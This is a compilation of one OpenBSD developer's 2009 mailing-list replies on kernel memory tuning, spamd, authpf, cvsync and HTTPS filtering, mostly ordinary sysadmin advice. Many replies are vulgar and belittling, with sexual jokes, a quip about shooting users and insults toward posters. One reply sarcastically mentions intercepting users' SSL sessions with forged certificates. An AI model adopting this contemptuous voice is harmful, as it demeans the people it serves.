so taunting or dismissive for people who whine without producing code?

Re: malloc: out of space in kmem_map

[Bob Beck]

2009/12/14 Jeff Ross jr...@openvistas.net:
 Hi all,

 While doing some pgbench runs on a new server before I put in on-line, I
 triggered a malloc: out of space in kmem_map panic.

 trace and ps (long) below, dmesg below that.

 I have adjusted sysctl values like so for postgres:

 # For PostgreSQL Port
 kern.seminfo.semmni=1024
 kern.seminfo.semmns=9082
 kern.shminfo.shmall=128000
 kern.shminfo.shmmax=202800

 I see softdep mentioned in the trace below, so here's /etc/fstab

Doctor doctor.. It hurts when I do this..

Well.. Don't do that!

Your problem is that the kernel has run out of kernel memory.

Those knobs you all cranked up to eleventy billion consume kvm. The
reason they are set
to lower limits is to prevent the sort of situation you have encountered.

When you crank them to eleventy billion, and then start eleventy
billion processes that
consume such resources. expect the possibility of issues.

Re: running openbsd 4.6 under qemu

[Bob Beck]

 Current qemu releases (more recent than in the ports tree) do not run on
 OpenBSD (have not been able to solve this yet *sigh*) so the above person
has
 Linux running natively and OpenBSD inside a newer qemu.  Originally it was
 kvm that had this bug but looks like qemu is now bug-for-bug compatible
with
 this in recent versions of qemu. Whee.

arch=qemu, arch=vmware anyone?

it's not like it's and acutal PC :)

Re: Why is getaddrinfo breaking POSIX?

[Bob Beck]

2009/12/11 Theo de Raadt dera...@cvs.openbsd.org:
 I did a quick perusal of the source (and compared it against the NetBSD
 tree) and it looks like the easiest way to
 make getaddrinfo() thread safe is to TURN OFF Yellow Pages (pee).

 NetBSD changes the only variable globals to local (in they yp code by
 removing the caching optimization) and puts
 a mutex in the yp code to protect its global variables.

 I would do the work but I can't test it (I have refused to use YP for
 the last 17.5 years).  If someone volunteers to
 test, I'll rework the code.

 It would be silly to turn off YP to solve this.

 It's much like saying that the simplest way to avoid children being
 hurt in car accidents during their teens is to abort them at birth.

 YP is good stuff.  It is going to get us LDAP for nearly free.


Indeed. far more sane to just make YP thread safe... Then we wouldn't
have to abort anything.

(Won't someone think of the children!)

Re: ComixWall terminated [WAS: ComixWall 4.6 released, December 8, 2009]

[Bob Beck]

 COMIXWALL isn't a fork, its just a preinstalled configuration panel
 for OpenBSD and a collection of nice utilities.

 And considering (and no offence here) the COMIXWALL developers are
 enthusiasts not paid professional developers.
 So where's the harm asking some advice?
After all lets face is some of the brightest minds in computer
 security lurk on this list and code for OpenBSD/OpenSSL.

So it belongs as a a port then. Not as a distibution - and not
sending release announcements to OpenBSD lists.

Do we see release announcements here for other new ports? Do we see
release announcements on our lists for Firefox?

The point is not whether comixwall is a good thing. While I'll debate
the wisdom of advertising yourself as a seperate distribtion when
really you are a set of configuration tools, the point is simple:

* Release Announcements For things that are not OpenBSD do not belong
on OpenBSD lists * - We don't tell people who have other ported
applications that run on openbsd to spew every release announcement
over our lists - why should ComixWall be any different?

This should not be difficult to understand.

Re: Free Gorillas

[Bob Beck]

2009/12/8 Paige Thompson erra...@devel.ws:
 ftp.openbsd.org got rid of the free gorillas, whats up with that?


According to eminent authority, it's because OpenBSD Developers are
Masturbating Monkeys - not gorillas.

Re: spamd greylisting and 2nd MX question

[Bob Beck]

I certainly do not see this behaviour. sounds to me very likely that your
primary is not reachable for some reason and they are trying the secondary.


2009/12/5  inet_use...@samerica.com:
 Hi,

 I am using the -M option of spamd and I am seeing a lot good servers
 being
 trapped because they tried the secondary MX first. What I am assuming is
 that they tried the primary MX, which created a greylist entry. But this
 entry expired, and after that, they tried to connect to the 2nd MX.

 If I increase the greyexp value of the -G option (which is the default
 of 4
 hours), I suppose the greylist entryfor these servers will last longer.

 Is there a chance that by doing so I will see less traps for this
 reason?

 Thanks in advance.

 Regards,

 Jose

Re: asynchronous I/O

[Bob Beck]

2009/12/4 Ted Unangst ted.unan...@gmail.com:
 On Fri, Dec 4, 2009 at 10:20 AM, Luis Useche use...@gmail.com wrote:

 Exactly, I am more interested more in something close to aio_read 
 aio_write. I was hoping there was some api I can use. Is there any
 reason why POSIX aio does not exist in OBSD?

 Nobody wrote it.



And:

APPLICATION USAGE

The aio_read() function is part of the Asynchronous Input and
Output option and need not be available on all implementations.

Re: TiVo + ATT/squid + web caching issue.

[Bob Beck]

Here's a nickel kid - Get a better ISP.

Fuck people, if you don't vote with your feet when they do this shit
eventually you'll be able to do nothing.


2009/12/1 Christopher Hilton ch...@vindaloo.com:
 I'm having a problem running a TiVo for my mother-in-law. To save some
money
 she changed her ISP to ATT. The issue is that ATT is running some sort of
 transparent web cache proxy at the base of their network and the TiVo will
not
 load it's daily guide data through the cache. ATT also charges for this
kind
 of Tech support so getting the caching issue fixed is not an option.

 I'm running my firewall on OpenBSD and my in-laws have a similar firewall
 setup. I have already setup an IPSEC VPN between their house and mine. The
 setup looks like this:


Tivo  [ In laws fw ] --- ( Internet ) --- [ my fw ] --- my net

 The firewall setup is for partially for my convenience. I want to
seamlessly
 get to my servers when I'm over there for a bit of time. Their default
gateway
 sends them to the internet through their ATT connection but can also get
to
 things on my network. If the tunnel goes down the internet works fine but
they
 cannot see things in my house.

 What I would like to do is arrange for their TiVo to pass all of it's
traffic
 through the tunnel and out through my firewall since my ISP is a bit easier
to
 deal with.

 -- Chris



  There will be an answer, Let it be.
   e: chris -at- vindaloo -dot- com

Re: Security via the NSA?

[Bob Beck]

Like everyone verifies SSL.. right?


2009/11/21 Samuel Baldwin recursive.for...@gmail.com:
 2009/11/21 AG computing.acco...@googlemail.com:
 Depends on whether one trusts the NSA or not.

 That's the nice thing about open source software; we don't have to,
 because we can verify their code or mathematics ourselves.

 --
 Samuel Baldwin - logik.li

Re: Spamd china and korea lists

[Bob Beck]

We're having issues witht them periodically blocking our access to the
site - which has happened since we have a failure.

I have a version of the lists there now, but I think it may actually
be time to retire that example from spamd.conf - those lists
just aren't as useful as they were in past years.


2009/11/24 Rod Whitworth glis...@witworx.com:
 On Tue, 24 Nov 2009 18:55:49 -0800, Jason LaRiviere wrote:

Hello all,

Willing to suffer scorn if I've missed a commit message or previous post on
the matter, but I've been getting a 404 for these two lists since
approximately the `unplanned maintenance' www event of a few weeks ago.
Shall
I comment them out of spamd.conf, or will they make their return?

Regards,
Jason.


 A long long time ago we had a similar problem. My solution has stayed
 in place ever since.
 Cobbled up QD but it works.
 script = okean:
 #!/bin/sh
 ftp -o /var/db/china.txt http://www.okean.com/chinacidr.txt
 ftp -o /var/db/korea.txt http://www.okean.com/koreacidr.txt

 crontab entry for okean:
 26  14  *   *   *   /root/bin/okean

 part of spamd.conf:
 8 snip--
 # Mirrored from http://www.okean.com/chinacidr.txt
 china:\
:black:\
:msg=SPAM. Your address %A appears to be from China\n\
See http://www.okean.com/asianspamblocks.html for more
 details:\
:method=file:\
:file=/var/db/china.txt:

 # Mirrored from http://www.okean.com/koreacidr.txt
 korea:\
:black:\
:msg=SPAM. Your address %A appears to be from Korea\n\
See http://www.okean.com/asianspamblocks.html for more
 details:\
:method=file:\
:file=/var/db/korea.txt:
 8end snip-

 No more problems since.
 Hints: pick some oddball time for the  cronjob, once a day is fine as
 changes are rare.
 I use a similar technique for nixspam too.

 Good enough for you?
 You're welcome!

 I think that the people running that site don't realise that it is
 better for OpenBSD to mirror it than to have us all hitting it daily
 but you just can't get through to some people.



 *** NOTE *** Please DO NOT CC me. I am subscribed to the list.
 Mail to the sender address that does not originate at the list server is
tarpitted. The reply-to: address is provided for those who feel compelled to
reply off list. Thankyou.

 Rod/
 ---
 This life is not the real thing.
 It is not even in Beta.
 If it was, then OpenBSD would already have a man page for it.

Re: Authpf and more than 992 users

[Bob Beck]

2009/11/18 Janusz Gumkowski janusz.gumkow...@am.torun.pl:

 Is it at all possible to have more than 992 simultaneous authpf users ?



Yes, use more than one machine.

 Digging out an old post of mine, still not having any real solution
 but a couple of ugly hacks instead, trying to get rid of them finally.

 To the point:  is allocating a pty for authpf logins really necessary ?

Yes.

 What side-efects can I expect if I disable it ?

Probably bad things.

Re: OpenBSD platform of choice?

[Bob Beck]

i386/amd64.  Nothing else is realistic these days.

Sparc64 is wonderful but is basically legacy - it's great for finding
bugs and I use it for hacking but is not something I run in
production.

All my production gear is i386 or amd64 - with a few exceptions. Yes,
the hardware sucks and the biosen were written by monkeys and have
their fingers in everything making the machine even more stupid.
There are no realistic alternatives. There might have been if Sun
hadn'tbeen so determined to turn itself from a good hardware company
into a company trying to compete in Microsoft's product space (selling
bad bloated software) where they had no hope of doing as well except
in crowds that would buy it because at least it's not Microsoft.


2009/11/9 Daniel Gracia Garallar danie...@electronicagracia.com:
 Hi there!

 Now that I have to change my little server farm and I'm able to choose a new
 platform, I would like to choose wisely.

 It's a matter of fact that Intel x86 is bogus-prone, and after experimenting
 a lot with OpenBSD and listening about the different archs since several
 years ago, I tend to think that most of the delevopers have a taste for
 Sparc derived machines as being more... predictable. But of course, no
 machine is bug free.

 So thinking about security and stability, what would be your OpenBSD
 platform of choice?

 Keep in mind that in this question price is not a factor. I'm just curious
 about preferences based on CPU features and their implementation on OpenBSD.

 Regards!

 Dani

Re: OpenBSD platform of choice?

[Bob Beck]

2009/11/12 Lars Nooden lars.cura...@gmail.com:

 Stupid business decisions aside, you can get if you try Sparc from Sun
 or Fujitsu for server work

Kind of, but I don't really think it's got a future. It's kind of like
advocating necrophila with a fresh corpse.. or maybe just doing it
with a really hot coma patient.  It might be really good for a short
time but you know there isn't much potential there for a long term
relationship.

Re: OpenBSD platform of choice?

[Bob Beck]

2009/11/12 Bob Beck b...@ualberta.ca:

 Kind of, but I don't really think it's got a future. It's kind of like
 advocating necrophila with a fresh corpse.. or maybe just doing it
 with a really hot coma patient.  It might be really good for a short
 time but you know there isn't much potential there for a long term
 relationship.


Or at least that is, unless you're into the old, messy, and unnatural.
We have people like that..

Re: Truncation Data Loss

[Bob Beck]

2009/11/10 Jussi Peltola pe...@pelzi.net:
 On Tue, Nov 10, 2009 at 11:18:57AM -0700, Theo de Raadt wrote:
 If you want to never lose data, you have an option.  Make the filesystem
 syncronous, using the -o sync option.

 If you can't accept the performance hit from that, then please accept
 that all the work done over the ages is only on ensuring metadata-safety
 for a low performance penalty.  It has never been about trying to
 promise file data consistancy when that could only be achieved by
 syncronous file data writing.

 And the more or less correct solution to improve the performance is
 battery backed RAID write cache, but it's no silver bullet.



 Other than it will still blow goats because it will be bashing
all that data synchronously over the bus.

The best silver bullets are the bullets that just shoot the users that
care either about this, and/or performance. Once you shoot enough of
them performance improves to an acceptable level.

Re: kern.bufcachepercent

[Bob Beck]

I don't know what version of plus46.html you are looking at - but that
text doesnt' appear in any version I look at.

Of course it is in the cvs commit log, but that's not the same thing.
That same commit was backed out before 4.6 - and has since gone back
into current.

2009/11/4 Luis Useche use...@gmail.com:
 On Tue, Nov 3, 2009 at 11:44 PM, Bob Beck b...@ualberta.ca wrote:
 2009/11/3 Luis Useche use...@gmail.com:


 I read in the 4.6 changelog that his was part of the release.

 Am I missing something? Do I have to recompile? Or this is just a bug?

 Yeah you are missing something. Listen to the *whole* presentation and
 read the *whole* changelog. This is *not* in 4.6

 It is in current.

 OK. Sorry for the noise. In any case, this change is in the 4.6
 changelog (twice, http://www.openbsd.org/plus46.html):

Re: http://www.theregister.co.uk/2009/11/03/linux_kernel_vulnerability/

[Bob Beck]

2009/11/3 Gilles Chehade gil...@openbsd.org:
 On Tue, Nov 03, 2009 at 04:58:25PM -0700, Theo de Raadt wrote:
 [bcc'd to Dan Goodin @ theregister]

 If anyone wants a choice quote from me about the recent Linux holes,
 this is what I have to say:

 Linus is too busy thinking about masturabating monkeys, he doesn't
 have time to care about Linux security.


 I was considering offering him this:

 http://www.wellcoolstuff.com/Merchant2/graphics/0001/20-Apr-07-05.jpg

 But couldn't get my hands on one yet ;-)

God damn Gilles.. And you didn't find one to bring to us at a hackathon!

Linus doesn't *deserve* one of those - I thought because I work on
OpenBSD only I do!

I will be deeply offended if Linus gets one of those before OpenBSD
developers do..  Well, the hell with the rest of you.. *I* at least
want one first.. Proudly!  Linus doesn't deserve one 'till he has a
commit in our tree. ;)

-Bob

Re: kern.bufcachepercent

[Bob Beck]

2009/11/3 Luis Useche use...@gmail.com:


 I read in the 4.6 changelog that his was part of the release.

 Am I missing something? Do I have to recompile? Or this is just a bug?

Yeah you are missing something. Listen to the *whole* presentation and
read the *whole* changelog. This is *not* in 4.6

It is in current.

Re: Secure way to delete data in hard disc

[Bob Beck]

2009/10/28 Noah Pugsley noa...@bendtel.com:
 Can I interest you in a pair of steganograpanties? Or for cooler weather,
 steganograpantaloons?

The problem with steganograpanties is that residual images of my ass
are present *underneath* the panties - therfore if the offending
Germans were to use high technology panty-removing chemicals (like
ethanol) they could actually view the residual data present underneath
the panties!  As assuredly every german who is after my ass will
possess this technology it behooves me to take adequate precatuions to
obscure the data... I'm thinking kind of along the lines of the
full-ass Kat-Von-D stenographic ass-stealthing tattoo...

Re: 200g harddisk after newfs = Available 174g?

[Bob Beck]

 There are many stupid ideas in other operating systems, I
 don't see why we should be required to implement them.

Yeah, and the discussion of my ass is a more productive discussion
than talking about making df display marketing gigabytes

That'll happen in openbsd right after we switch the default filesystem
to apple hfs, and while we're at it replace the yp code with netinfo
because it's so much better.

Re: privileged instruction fault trap

[Bob Beck]

2009/10/29 Roger Schreiter ro...@planinternet.de:

 Today, the system crashed,

.

 kernel: privileged instruction fault trap, code=0
 Stopped at  ip_output +0xb8:
 ddb _

.

 Any helpful hints?


http://www.openbsd.org/cgi-bin/man.cgi?query=crashapropos=0sektion=0manpat
h=OpenBSD+Currentarch=i386format=html

Re: PF challenge dealing with HTTPS URL restriction policies.. would it help, other possible solution?

[Bob Beck]

apache or other reverse proxy.


2009/10/29 Matthew Young myoung24...@gmail.com:
 Hello,


 Iam looking for a way to have an allowed list of SSL enabled sites
 that a end user can browse, but this entirely done on a server level
 with _zero_ configuration on the pc.

 In a dream world, squid would be able to tranparently proxy https and
 thus I would create  an allowed list of ssl sites specific to each LAN
 user (based on private IP or MAC) that he/she can access. As we know
 this isnt the case because this breaks SSL.

 Does anybody know a way I can actually accomplish this?

 My Thoughts:
 I thought of a way to then take my list of SSL enabled sites
 (gmail.com for example) and resolve the domain to an IP and then add
 it in a firewall so that X user has
 access to port 443 for only those specific IPs.  However the downside
 to this is that if gmail (or any other site i do this) changes the IP
 (which they will) the firewall rule which is static would need an
 update. Besides gmails https hostname resolves to the same IP of
 google.com A records so I would be fiddling with those at the same
 time and thus basically be allowing or disallowing the entire google
 domain when I truely really wanted just an access list of gmail.com.

 Would there be a way to make then some type of sniffer which would
 capture when users try to enter a https site and then somehow create a
 dynamic rule of some kind to let traffic out based on an allowed list?

 There must be a practical way, right guys?

 Thanks

 --Matt

Re: PF challenge dealing with HTTPS URL restriction policies.. would it help, other possible solution?

[Bob Beck]

Yep. That's why https encrypts the url transmission.

The point is you aren't *supposed* to be able to do that securely.
Your reverse proxy which does this will look like the standard hotel
room sillyness.


2009/10/29 Matthew Young myoung24...@gmail.com:
 Hello,

 If I use a reverse proxy I would have to know the SSL key of the
 remote SSL site. (gmail.com) so that the reverse proxy server would
 decrypt and encrypt. Iam not mistaken.

 -- Matt

 On Thu, Oct 29, 2009 at 2:50 PM, Bob Beck b...@ualberta.ca wrote:
 apache or other reverse proxy.


 2009/10/29 Matthew Young myoung24...@gmail.com:
 Hello,


 Iam looking for a way to have an allowed list of SSL enabled sites
 that a end user can browse, but this entirely done on a server level
 with _zero_ configuration on the pc.

 In a dream world, squid would be able to tranparently proxy https and
 thus I would create  an allowed list of ssl sites specific to each LAN
 user (based on private IP or MAC) that he/she can access. As we know
 this isnt the case because this breaks SSL.

 Does anybody know a way I can actually accomplish this?

 My Thoughts:
 I thought of a way to then take my list of SSL enabled sites
 (gmail.com for example) and resolve the domain to an IP and then add
 it in a firewall so that X user has
 access to port 443 for only those specific IPs.  However the downside
 to this is that if gmail (or any other site i do this) changes the IP
 (which they will) the firewall rule which is static would need an
 update. Besides gmails https hostname resolves to the same IP of
 google.com A records so I would be fiddling with those at the same
 time and thus basically be allowing or disallowing the entire google
 domain when I truely really wanted just an access list of gmail.com.

 Would there be a way to make then some type of sniffer which would
 capture when users try to enter a https site and then somehow create a
 dynamic rule of some kind to let traffic out based on an allowed list?

 There must be a practical way, right guys?

 Thanks

 --Matt

Re: openbsd ca tutorial

[Bob Beck]

http://lmgtfy.com/?q=OpenSSL+set+up+own+Certificate+Authority

2009/10/29 Abdullah Sendul coffeesm...@gmail.com:
 Hi,

 I am trying to create my own CA on openbsd. but unfortunately couldnt
 find any tutorial on this, there are some on freebsd, linux, but they
 are giving some errors.

 can you please point me correct place if there is one.

 thanks

 \sendul

Re: PF challenge dealing with HTTPS URL restriction policies.. would it help, other possible solution?

[Bob Beck]

Not unless you know the ip addreses of everything you're hitting.  No
amount of magic will make relayd intercept an https session and get
the url out without sending a bogus certificate to the user.  If you
have a limited set of places to go, sure, it'll work, but so will just
a plain old pf rule restrincting outbound 443 connections to the same
set of addresses.  Trying to do this for akamai type moving targets
willl be an exercise in frustration though.

You could always just ensure all your users are using internet
explorer or firefox with all the whining turned off, and intercept the
ssl cookies anyway. Most of the users probably won't notice or will
click ok and simply blather along after clicking ok enough times to
make it accept the forgery.

2009/10/29 James Records james.reco...@gmail.com:
 may be able to do something with relayd, though i'm not sure.

 J

 On Thu, Oct 29, 2009 at 12:57 PM, Matthew Young myoung24...@gmail.com
 wrote:

 Hello,

 If I use a reverse proxy I would have to know the SSL key of the
 remote SSL site. (gmail.com) so that the reverse proxy server would
 decrypt and encrypt. Iam not mistaken.

 -- Matt

 On Thu, Oct 29, 2009 at 2:50 PM, Bob Beck b...@ualberta.ca wrote:
  apache or other reverse proxy.
 
 
  2009/10/29 Matthew Young myoung24...@gmail.com:
  Hello,
 
 
  Iam looking for a way to have an allowed list of SSL enabled sites
  that a end user can browse, but this entirely done on a server level
  with _zero_ configuration on the pc.
 
  In a dream world, squid would be able to tranparently proxy https and
  thus I would create  an allowed list of ssl sites specific to each LAN
  user (based on private IP or MAC) that he/she can access. As we know
  this isnt the case because this breaks SSL.
 
  Does anybody know a way I can actually accomplish this?
 
  My Thoughts:
  I thought of a way to then take my list of SSL enabled sites
  (gmail.com for example) and resolve the domain to an IP and then add
  it in a firewall so that X user has
  access to port 443 for only those specific IPs.  However the downside
  to this is that if gmail (or any other site i do this) changes the IP
  (which they will) the firewall rule which is static would need an
  update. Besides gmails https hostname resolves to the same IP of
  google.com A records so I would be fiddling with those at the same
  time and thus basically be allowing or disallowing the entire google
  domain when I truely really wanted just an access list of gmail.com.
 
  Would there be a way to make then some type of sniffer which would
  capture when users try to enter a https site and then somehow create a
  dynamic rule of some kind to let traffic out based on an allowed list?
 
  There must be a practical way, right guys?
 
  Thanks
 
  --Matt

Re: PF challenge dealing with HTTPS URL restriction policies.. would it help, other possible solution?

[Bob Beck]

browsing ssl by IP addresses will also result in certificate conflicts
- because the ssl cert is for the name not the IP address.

So if they were willing to do that, they're willing to have your
stupid reverse proxy mitm all your certificates since they'll also
fail.

Perhaps between my extermely subtle taunting, I should give up and
just ask you *why* the hell do you want to do this?


2009/10/29 Matthew Young myoung24...@gmail.com:
 THis is great, however out LAN users are all technical. they would
 know and the next thing I have is people browsing the internet through
 IPs.

 It was good, but not applicable here.


 On Thu, Oct 29, 2009 at 3:11 PM, Chris Kuethe chris.kue...@gmail.com wrote:
 So run your own dns and only resolve good domains. Then the proxy can only
 find the things you want it to.

 On Oct 29, 2009 1:03 PM, Matthew Young myoung24...@gmail.com wrote:

 Hello,

 If I use a reverse proxy I would have to know the SSL key of the
 remote SSL site. (gmail.com) so that the reverse proxy server would
 decrypt and encrypt. Iam not mistaken.

 -- Matt

 On Thu, Oct 29, 2009 at 2:50 PM, Bob Beck b...@ualberta.ca wrote:  apache
 or other reverse proxy...

Re: Secure way to delete data in hard disc

[Bob Beck]

 I would rather my family photos

Yeah, but I hike with bastards who take pictures of my ass and put it
up on the internet for all to see..   So how can I delete the data
from his web server? Is there some kind of remote bioctl --de-assify I
could run?

Re: Secure way to delete data in hard disc

[Bob Beck]

 What, you have pictures of my ass too?

Obviously I must make something to write a random pattern over my
entire ass so that It won't be recognized if some germans steal it.

Re: Secure way to delete data in hard disc

[Bob Beck]

2009/10/28 Henning Brauer lists-open...@bsws.de:
 * Bob Beck b...@openbsd.org [2009-10-28 20:57]:
  I would rather my family photos

 Yeah, but I hike with bastards who take pictures of my ass and put it
 up on the internet for all to see..   So how can I delete the data
 from his web server? Is there some kind of remote bioctl --de-assify I
 could run?

 yes:
 echo delete this pic of my ass: http:///; | mail -s asspic henning


What, you have pictures of my ass too?

:)

Re: CVSync problems?

[Bob Beck]

ahhh. Nick, you should not be depending on mirrors to run cvsync to do that.

Every time you pull the repository from me you should afterwards run a
cvscan..

cvscan -c /etc/cvsyncd.conf

which recreates the file correctly every time.

-Bob


2009/10/19 Nick Holland n...@holland-consulting.net:
 naddy@ told me the solution...

 cvsync keeps what it calls a scanfile, apparently tracking what versions
 it has of what files.  The file is specified in the cvsync config file you
 use when you run cvsync.  In my case, it was about 14M in size.  Rename
that
 file, and re-run cvsync, it will recreate the file.  This run will probably
 take a little longer, but it fixed my problem nicely.  Naddy@ indicated
that
 you may need to delete the gnu/gcc directory as well, but I don't seem to
 have needed to do that.

 It is POSSIBLE some mirrors might have this problem, in which case the
 mirror operator will need to do that, but my mirror (obsd.cec.mtu.edu)
 seems to have no cvsync problems itself, just my local copy was messed up.

 Nick.

 Nick Holland wrote:

 Emilio Perea wrote:

 There seems to be a problem with CVSync updates (at least
 anoncvs1.usa.openbsd.org and anoncvs3.usa.openbsd.org).  I believe this
 started about the time a large number of changes to gcc were made.

 After updating the tree with csup, run cvsync:

 I'm seeing a problem, too, starting evening of Oct 15:

 ...
  Create src/gnu/gcc/fixincludes/tests/base/time.h,v
  Create src/gnu/gcc/fixincludes/tests/base/tinfo.h,v
  Mkdir src/gnu/gcc/fixincludes/tests/base/types
 Failed

 (and failures ever since)

 However, my upstream mirror (which I help manage :) is not showing
 an error, and has been happily cvsyncing before and after.
 I'm still investigating what is going on...I'm guessing something
 got partly synced, and may need to be fixed somewhere, but not sure
 where yet.  I'm doing some testing, but it will take a while to
 give me any clues...

 Nick.



 - Forwarded message from Cron Daemon r...@hermes.walkereng.com
 -

 Date: 18 Oct 2009 13:30:01 -
 From: Cron Daemon r...@hermes.walkereng.com
 To: epe...@hermes.walkereng.com
 Subject: Cron epe...@hermes /home/eperea/Bin/cvsupdate

 Starting /home/eperea/Bin/cvsupdate: Sun Oct 18 08:30:01 CDT 2009
 Connecting to anoncvs3.usa.openbsd.org port 
 Connected to 192.43.244.161 port 
 Running...
 Updating (collection openbsd/rcs)
 /open/anoncvs/cvs/ports/databases/py-storm/patches/patch-test,v: No such
 file or directory
 Socket Error: send: Broken pipe
 Mux(SEND) Error: send
 FileScan(RCS): UPDATE
 /open/anoncvs/cvs/ports/devel/gconf-editor/Makefile,v
 FileScan: RCS Error
 Socket Error: recv: Connection reset by peer
 Receiver Error: recv
 Mux(RECV) Error: not running: 1
 Updater: RCS Error
 Mux(SEND) Error: not running: 0
 DirScan: RCS Error
 Failed
 Finished updating cvs: Sun Oct 18 08:30:33 CDT 2009

 - End forwarded message -

 Csup still runs without errors:

 - Forwarded message from Cron Daemon r...@hermes.walkereng.net
 -

 Date: 18 Oct 2009 13:45:01 -
 From: Cron Daemon r...@hermes.walkereng.net
 To: epe...@hermes.walkereng.net
 Subject: Cron epe...@hermes /home/eperea/Bin/old.cvsupdate

 Starting /home/eperea/Bin/cvsupdate: Sun Oct 18 08:45:01 CDT 2009
 Connected to 194.45.27.107
 Updating collection OpenBSD-all/cvs
  Append to CVSROOT/ChangeLog
  Append to CVSROOT/ChangeLog.37
  Append to CVSROOT/val-tags
  Edit ports/infrastructure/build/libtool,v
 Finished successfully
 Finished updating cvs: Sun Oct 18 08:47:56 CDT 2009

 - End forwarded message -

Re: Forum engine

[Bob Beck]

 ... how inexperienced web developers default to using MySQL because it
 has a lower barrier to entry, without considering if it's the right tool
 for the job or how to configure and secure it appropriately for
 production use.

s/MySQL/php/g
s/MySQL/asp/g
s/MySQL/JavaScript/g


s/inexperienced//g --- If there are *experienced* web developers -
they don't write the code.

Now you see.. the problem isn't the tools.. it's the Tools that are
using them. No all web developers aren't tools, but there's a vast
majority, so much so it's hard to find one that doesn't suck that
hasn't been assimilated into the Google collective or something
similar.